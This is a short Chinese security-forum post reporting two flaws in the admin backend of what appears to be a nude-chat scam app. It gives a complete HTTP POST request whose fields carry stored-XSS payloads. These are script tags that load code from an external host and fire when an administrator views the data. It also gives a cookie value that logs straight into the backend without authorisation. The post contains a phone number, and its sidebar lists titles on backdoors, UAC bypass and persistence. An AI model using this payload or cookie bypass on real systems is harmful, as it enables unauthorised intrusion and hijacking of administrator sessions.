某裸聊后台未授权访问漏洞+XSS漏洞-思路分享社区-Web安全-赤道学院

某裸聊后台未授权访问漏洞+XSS漏洞

root徽章-创作大使-赤道学院等级-LV2-赤道学院9小时前发布
10

该裸聊APP前台接受数据存在XSS

XSS漏洞

POST /api/D302AD2E17B400B8E8CB91BE3B32F2CD HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 198
Host: 127.0.0.1:91
Connection: close
User-Agent: okhttp/3.8.0

myInfo=%5B%5D&deviceID=<script src=//xxxx></script>&myWhere=-&tel=%2B8617644871170&myMsgs=%5B%5D&myModel=HD1910&myWho=002&myRoom=<script src=//xxx></script>&myTel=<script src=//xxx></script>
 

后台会直接触发。

未授权访问

http://127.0.0.1:91/li/Index/Orders/002

在Cookie中携带:userid=vip3 即可直接登陆。

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

用户封面
root的头像-赤道学院
开启XP_CMDSHELL的多种方案
宝塔面板之定义一个自动登录后门
宝塔将指定Header Key的所有请求日志不存储到数据库
Stunnel + HaProxy + Danted 打造属于自己的 Socket5 代理池
PowerShell修改lnk属性实现BypassUac
Ubuntu 开启证书登录与密钥登录双模式运行
热门帖子

热门文章
权限维持之隐藏计划任务多版本实战演示-赤道学院
929人已阅读
权限维持之隐藏计划任务多版本实战演示
TOP1
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址-赤道学院
复盘冒充公检法的违法犯罪网站+APP修改数据回传地址
11个月前253人已阅读
TOP2
SSRF漏洞之Gopher协议发起GET与POST请求-赤道学院
SSRF漏洞之Gopher协议发起GET与POST请求
10个月前252人已阅读
TOP3
Windows 管理员账户空密码如何实现登陆?-赤道学院
Windows 管理员账户空密码如何实现登陆?
10个月前205人已阅读
TOP4
BurpSuite进行后台管理员账户密码爆破-赤道学院
BurpSuite进行后台管理员账户密码爆破
10个月前204人已阅读
TOP5
SQL注入+文件下载实现任意文件读取-赤道学院
SQL注入+文件下载实现任意文件读取
11个月前197人已阅读
TOP6
扫码添加微信-赤道学院
在手机上浏览此页面